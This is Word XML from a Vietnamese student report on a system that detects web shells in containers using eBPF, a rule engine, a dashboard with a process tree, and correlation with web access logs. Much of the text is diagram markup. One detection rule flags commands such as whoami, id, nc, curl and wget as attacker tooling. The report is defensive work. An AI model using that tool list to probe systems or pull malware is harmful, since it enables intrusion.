        <w:t>Execve rule: cảnh báo khi có các lệnh bất thường được thực thi như ls, cat, whoami, id,... đặc biệt là các lệnh nc, curl, wget. Các lệnh này giúp kẻ tấn công khảo sát môi trường, tải thêm mã độc hoặc thiết lập các kênh giao tiếp với bên ngoài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Trong phạm vi của đồ án, các luật được thiết kế theo mô hình Simple Rule, nghĩa là mỗi luật chỉ đánh giá một sự kiện độc lập dựa trên loại sự kiện và các thuộc tính của nó. Cách tiếp cận này giúp hệ thống phát hiện nhanh các hành vi có dấu hiệu nguy hiểm mà không cần phân tích toàn bộ chuỗi hoạt động của tiến trình.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khi một sự kiện thỏa mãn điều kiện của một hoặc nhiều luật, Rule Engine sẽ sinh một bản ghi cảnh báo (Alert), bổ sung thông tin phát hiện, mức độ nghiêm trọng và hành động xử lý tương ứng. Cảnh báo được đưa vào Alert Queue để Dashboard tiếp nhận và hiển thị cho người quản trị</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_heading=h.v0ehfk4nr24n" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkStart w:id="63" w:name="_Toc1821526878"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dashboard  là giao diện giám sát thời gian thực của hệ thống, cho phép người quản trị theo dõi các hoạt động đang diễn ra trong container, quan sát các cảnh báo được sinh ra từ Rule Engine và hỗ trợ phân tích mối quan hệ giữa các tiến trình. Dashboard hoạt động độc lập với các thành phần thu thập dữ liệu, chỉ tiếp nhận sự kiện và hiển thị thông qua các hàng đợi, nhờ đó không ảnh hưởng đến hiệu năng của quá trình giám sát. Dashboard gồm các thành phần chính: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Live event: Hiển thị toàn bộ các sự kiện được Logger gửi đến theo thời gian thực. Phản ánh đầy đủ các hoạt động đang diễn ra trong container, bao gồm việc tạo tiến trình, thực thi lệnh, truy cập tập tin và thiết lập kết nối mạng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Alert View: hiển thị các cảnh báo do Rule Engine sinh ra sau khi đối chiếu với tập luật, giảm nhiễu và hỗ trợ người quản trị nhanh chóng phát hiện các hoạt động có dấu hiệu bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Event Detail và Process Tree: hiển thị các thông tin chi tiết về tiến trình đồng thời trực quan hóa mối quan hệ cha - con giữa các tiến trình và hỗ trợ quá trình truy vết nguồn gốc của hành vi nghi vấn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_heading=h.q5o1dkxa4sno" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkStart w:id="65" w:name="_Toc1091884872"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Cây tiến trình</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Công cụ hỗ trợ người quản trị nhìn nhận rõ hơn về tiến trình. Khi chỉ quan sát các sự kiện theo thứ tự thời gian, người quản trị chỉ biết rằng các sự kiện đã xảy ra nhưng rất khó để xác định chúng thuộc tiến trình nào hoặc do tiến trình nào sinh ra. Đặc biệt trong môi trường Web shell, một mã độc hoàn toàn có thể sinh ra nhiều tiến trình con, khiến việc theo dõi danh sách sự kiện trở nên khó khăn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Process Tree được dựng lên dựa trên việc xây dựng bộ nhớ đệm (process cache) của hệ thống, bộ nhớ đệm này map lại cặp event ID - parent event ID, từ đó truy xuất ra cây tiến trình một cách nhanh chóng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_heading=h.gvjldwxrc3c3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkStart w:id="67" w:name="_Toc215810138"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thành Phần mở rộng Web Server Access Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Đối với hệ thống sử dụng eBPF để phát hiện Web Shell, việc giám sát trực tiếp các hoạt động tại tầng kernel mang lại ưu điểm lớn về khả năng quan sát và thời gian phát hiện hành vi thực thi đáng ngờ. Tuy nhiên, dữ liệu thu thập từ eBPF chủ yếu phản ánh các hoạt động ở mức hệ thống như tiến trình, tệp tin và kết nối mạng, do đó chưa cung cấp đầy đủ ngữ cảnh của các yêu cầu HTTP tại tầng ứng dụng Web. Điều này gây khó khăn cho việc truy vết nguồn gốc của hành vi tấn công, chẳng hạn xác định endpoint hoặc yêu cầu HTTP nào có liên quan đến chuỗi hành vi đáng ngờ được phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Xuất phát từ hạn chế trên, hệ thống được mở rộng với một thành phần giám sát hoạt động Web thông qua Web Server Access Log. Thành phần này có nhiệm vụ thu thập và phân tích các thông tin của HTTP request như thời gian, phương thức, URI, địa chỉ nguồn, User-Agent và các thông tin liên quan. Dựa trên dấu thời gian của các sự kiện được phát hiện bởi eBPF, hệ thống thực hiện tương quan với các Web Log trong một khoảng thời gian xác định để tìm ra các HTTP request có khả năng liên quan đến hành vi đáng ngờ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Việc kết hợp dữ liệu ở hai tầng giúp hệ thống vừa duy trì khả năng phát hiện nhanh các hành vi thực thi đáng ngờ của eBPF, vừa bổ sung được ngữ cảnh ở tầng Web. Từ đó, quản trị viên có thể xác định được yêu cầu Web có khả năng dẫn đến hành vi tấn công, hỗ trợ quá trình điều tra nguyên nhân, xác định endpoint có khả năng bị khai thác và đưa ra biện pháp khắc phục lỗ hổng kịp thời.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
                <wp:extent cx="5939155" cy="6619875"/>
                <wp:effectExtent l="0" t="4445" r="23495" b="5080"/>
                <wp:docPr id="110" name="Group 110"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="1030775" y="224125"/>
                          <a:ext cx="5939155" cy="6619875"/>
                          <a:chOff x="977121" y="228899"/>
                          <a:chExt cx="8859704" cy="7217150"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="111" name="Shape 54"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1035558" y="1898709"/>
                            <a:ext cx="3446816" cy="4997660"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="0000FF"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="sm" len="sm"/>
                            <a:tailEnd type="none" w="sm" len="sm"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p>
                              <w:pPr>
                                <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:sz w:val="22"/>
                                  <w:szCs w:val="22"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="118" name="Shape 55"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1561495" y="6164615"/>
                            <a:ext cx="2365229" cy="457605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>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Docker compose</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="119" name="Shape 56"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1617697" y="2124563"/>
                            <a:ext cx="2139600" cy="14430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Nginx Reverse Proxy</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="121" name="Shape 57"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1617697" y="4657150"/>
                            <a:ext cx="2139600" cy="13533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Flask App</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="122" name="Shape 58"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1403808" y="228900"/>
                            <a:ext cx="2567400" cy="8061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Client</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="123" name="Straight Arrow Connector 123"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2687508" y="1035000"/>
                            <a:ext cx="0" cy="1089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29" name="Shape 60"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2687653" y="1263876"/>
                            <a:ext cx="3110058" cy="457605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>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HTTP Request :8080</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="130" name="Straight Arrow Connector 130"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2687497" y="3567563"/>
                            <a:ext cx="0" cy="1089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31" name="Shape 62"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2634168" y="3942356"/>
                            <a:ext cx="2702977" cy="457605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>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HTTP Request :5000</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="132" name="Shape 63"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4680903" y="2530166"/>
                            <a:ext cx="2070222" cy="777362"/>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Ghi access Log</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="133" name="Straight Arrow Connector 133"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3757297" y="2846063"/>
                            <a:ext cx="924000" cy="2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34" name="Straight Arrow Connector 134"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="2432308" y="3572400"/>
                            <a:ext cx="0" cy="1094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35" name="Straight Arrow Connector 135"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="2432308" y="1037898"/>
                            <a:ext cx="0" cy="1094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36" name="Shape 67"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="977121" y="1218877"/>
                            <a:ext cx="1661009" cy="457605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>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Response</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="137" name="Shape 68"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1014759" y="3828820"/>
                            <a:ext cx="1418345" cy="599525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>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Response</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="144" name="Shape 69"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8155016" y="228899"/>
                            <a:ext cx="1279680" cy="736599"/>
                          </a:xfrm>
                          <a:prstGeom prst="ellipse">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 xml:space="preserve">  Start</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="146" name="Shape 70"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="7766823" y="2796299"/>
                            <a:ext cx="2070000" cy="63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Đọc access Log</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="147" name="Shape 71"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="7766754" y="1390588"/>
                            <a:ext cx="2070071" cy="999905"/>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 xml:space="preserve">eBPF Agent kích hoạt </w:t>
                              </w:r>
                            </w:p>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Web Log Analyzer</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="148" name="Shape 72"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="7766823" y="4050174"/>
                            <a:ext cx="2070000" cy="63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Filter theo timestamp</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="149" name="Shape 73"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="7766823" y="5455649"/>
                            <a:ext cx="2070000" cy="636900"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">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Hiển thị</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="152" name="Shape 74"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8249516" y="6709549"/>
                            <a:ext cx="1104600" cy="736500"/>
                          </a:xfrm>
                          <a:prstGeom prst="ellipse">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="CFE2F3"/>
                          </a:solidFill>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="sm" len="sm"/>
                            <a:tailEnd type="none" w="sm" len="sm"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>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 xml:space="preserve">  End</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="153" name="Straight Arrow Connector 153"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8801816" y="965399"/>
                            <a:ext cx="0" cy="425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54" name="Straight Arrow Connector 154"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8799230" y="2403144"/>
                            <a:ext cx="2972" cy="393021"/>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55" name="Straight Arrow Connector 155"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8801823" y="3433199"/>
                            <a:ext cx="0" cy="6171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56" name="Straight Arrow Connector 156"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8801823" y="4687074"/>
                            <a:ext cx="0" cy="768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Pr id="157" name="Straight Arrow Connector 157"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8801823" y="6092549"/>
                            <a:ext cx="0" cy="6171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pict>
              <v:group id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="203" style="height:521.25pt;width:467.65pt;" coordorigin="977121,228899" coordsize="8859704,7217150" o:gfxdata="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">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:rect id="Shape 54" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:1035558;top:1898709;height:4997660;width:3446816;v-text-anchor:middle;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Jkfv8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FF"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p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 55" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:1561495;top:6164615;height:457605;width:2365229;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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Docker compose</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 56" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:1617697;top:2124563;height:1443000;width:2139600;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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PU/aF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Nginx Reverse Proxy</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 57" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:1617697;top:4657150;height:1353300;width:2139600;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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9JMD6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Flask App</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 58" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:1403808;top:228900;height:806100;width:2567400;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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I+brkm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Client</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2687508;top:1035000;height:1089600;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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HEbCxi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Shape 60" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:2687653;top:1263876;height:457605;width:3110058;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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JnZhUb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HTTP Request :8080</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2687497;top:3567563;height:1089600;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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AQQA7LAAAAA3A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color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="Shape 62" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:2634168;top:3942356;height:457605;width:2702977;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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Xdn7i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HTTP Request :5000</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 63" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:4680903;top:2530166;height:777362;width:2070222;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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pCOJS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Ghi access Log</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:3757297;top:2846063;height:2400;width:924000;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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9MKdx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2432308;top:3572400;height:1094700;width:0;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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">
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
